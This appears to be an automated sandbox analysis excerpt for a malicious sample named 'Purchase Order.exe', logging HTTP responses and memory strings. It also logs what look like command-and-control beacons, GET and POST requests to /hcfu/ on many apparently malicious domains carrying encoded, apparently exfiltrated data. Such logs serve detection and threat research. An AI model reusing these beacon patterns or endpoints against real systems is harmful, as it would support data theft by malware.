Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:07:50 GMTServer: ApacheContent-Length: 688Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4e 75 6e 69 74 6f 3a 34 30 30 2c 37 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 56 61 72 65 6c 61 2b 52 6f 75 6e 64 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 70 3e 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 79 6f 75 27 72 65 20 6c 6f 73 74 2e 2e 2e 3c 62 72 2f 3e 54 68 61 74 27 73 20 61 20 74 72 6f 75 62 6c 65 3f 3c 2f 70 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 47 6f 20 62 61 63 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>Error 404</title> <link href='https://fonts.googleapis.com/css?family=Nunito:400,700' rel='stylesheet' type='text/css'><link href='https://fonts.googleapis.com/css?family=Varela+Round' rel='stylesheet' type='text/css'><link rel="stylesheet" href="/style.css"></head><body><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="main"> <h1>404</h1> <p>It looks like you're lost...<br/>That's a trouble?</p> <button type="button">Go back</button></div> <script src="/script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Oct 2022 09:07:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Oct 2022 09:07:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 24 Oct 2022 09:08:02 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 39X-Rate-Limit-Reset: 2022-10-24T09:08:07.9761631Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Oct 2022 09:08:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Oct 2022 09:08:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 24 Oct 2022 09:08:46 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 24 Oct 2022 09:08:49 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:09:02 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.20.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:09:04 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:09:14 GMTServer: ApacheContent-Length: 236Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>

Source: rundll32.exe, 00000010.00000002.781832452.00000000053A0000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://malaya.live/hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnss
Source: Purchase Order.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rundll32.exe, 00000010.00000002.781911568.00000000056C4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: rundll32.exe, 00000010.00000002.781653306.0000000004D58000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: rundll32.exe, 00000010.00000002.781653306.0000000004D58000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
Source: 178I6H21.16.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 178I6H21.16.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 178I6H21.16.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 178I6H21.16.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 178I6H21.16.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: rundll32.exe, 00000010.00000002.781955741.0000000005856000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Nunito:400
Source: rundll32.exe, 00000010.00000002.781955741.0000000005856000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Varela
Source: 178I6H21.16.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 178I6H21.16.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 178I6H21.16.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 178I6H21.16.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 178I6H21.16.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /hcfu/ HTTP/1.1Host: www.modbox.siteConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.modbox.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.modbox.site/hcfu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 30 47 70 32 76 70 38 3d 28 61 50 65 70 73 5a 53 75 53 79 67 50 6c 59 5f 63 53 30 76 75 6a 4a 2d 47 50 38 63 35 64 54 30 31 71 75 4f 75 4f 65 54 46 34 56 72 33 62 4c 6d 41 77 35 47 69 56 38 66 55 38 4e 33 4a 69 37 6e 7e 46 63 49 6f 63 75 6d 48 62 79 4c 4c 48 4e 74 78 4e 73 75 43 63 46 56 64 70 7a 5f 37 79 46 4f 7a 57 57 65 62 53 6c 55 64 67 4e 41 55 66 45 43 63 73 67 4c 46 6a 32 62 7e 66 39 61 30 72 4b 6d 50 50 74 64 64 37 78 6a 50 76 45 30 6b 31 56 66 79 39 79 67 62 52 65 62 70 4c 4f 78 77 35 35 5f 6a 55 36 74 31 5f 31 53 6d 49 74 69 4e 62 4b 62 6b 39 70 50 7a 77 55 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=(aPepsZSuSygPlY_cS0vujJ-GP8c5dT01quOuOeTF4Vr3bLmAw5GiV8fU8N3Ji7n~FcIocumHbyLLHNtxNsuCcFVdpz_7yFOzWWebSlUdgNAUfECcsgLFj2b~f9a0rKmPPtdd7xjPvE0k1Vfy9ygbRebpLOxw55_jU6t1_1SmItiNbKbk9pPzwU.

Source: unknown

DNS traffic detected: queries for: www.wewantabreak.com

Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ HTTP/1.1Host: www.wewantabreak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=yYn+qZAupgKndVEJZAA+lgE9F5IM2sy/uZGFuMXNIoF6xPzYCilz1R0fY+ZXeAeHxVBnntuSE8HuR3hJw5pyMvZ/VaC3rRJ0nFaxYVwTY2Y1&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.modbox.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=3O8YptSPemKM8sIzZF8JOEGsdynbMd9NIarJRYJ/0cybmcm84igDod77Kw8YrhDfbeeXJmV/Xta+McyiqIfptDKdRtzZKR6FvkWjf1CaB2nt HTTP/1.1Host: www.occludy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=QpRnf8hbMplr0MVruU+mSsmXd47Y/RN6g+aq49FGHEQqzvBAGK38lH6pvC4RIkCAaMFgrfUcGt/BsHWKvIAR7oL0ypwQXqHPXRUpgIJQNUAI&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=FnNfFBdE6KPnVJCtupekHJkjgZFJe5QHOUSjJCZmfBdQKmSNG8cathNKdTXwFUOlpWErHg09uuesQ1LGhXMc+UdVb1pWxSsiOvNgB/qg6YJ5 HTTP/1.1Host: www.opulentdome.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=e8urorjn5YtBqVBAKQkFOVgb5XRHX95iuVbYmP4qxYw81TZ13rhAoUApmzfpT8nnssMZ1gBiQNZAQWNQOMLHZ0WRUsNJ0JTIQulzNrWS92rI&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.malaya.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=OmX4tUPXqRB8MMCbJ2d2I1QXSAa/kGMN1kVgIVLBij3Fuh3JYlWO9rbbVhNUJ+THoGRZCsrEKqKuThOHyDfP/PgcDPlZBbCCTOt+7qepiG6w HTTP/1.1Host: www.nnncb.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=nmIKxue9fq/wPVZukOB9TkwbQhnMn+EZhkHuSgXE385x5HS1Nfm9dHmrnO7NAE1ZtguQW3vFvHO2aEKxRmVjqrDRtY5yZbLfhBI/hScq3dTS&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.majordaiyanoace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=UPFzOWHvXr6LKM54fFGvr+bgYv8T+gbn3IMA7mHIEAJt3ghNPXPHkJgJBAr3zVB6bc8AwaR/viz1MkvVp6+rG9931Jf00GsCyWVh4zhHjPJo HTTP/1.1Host: www.bandmarket.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=N5Qoe7UIPaIJGls62JHU55z9VEWHJXpA5+wYVkYKdF3K4Zdll/5ZVGJr2YZtu9BOKd0IRETCZdDAH2zdX5+9rG9zeMIKFk9wrK0cQWJhYt3t&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.aurakids.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
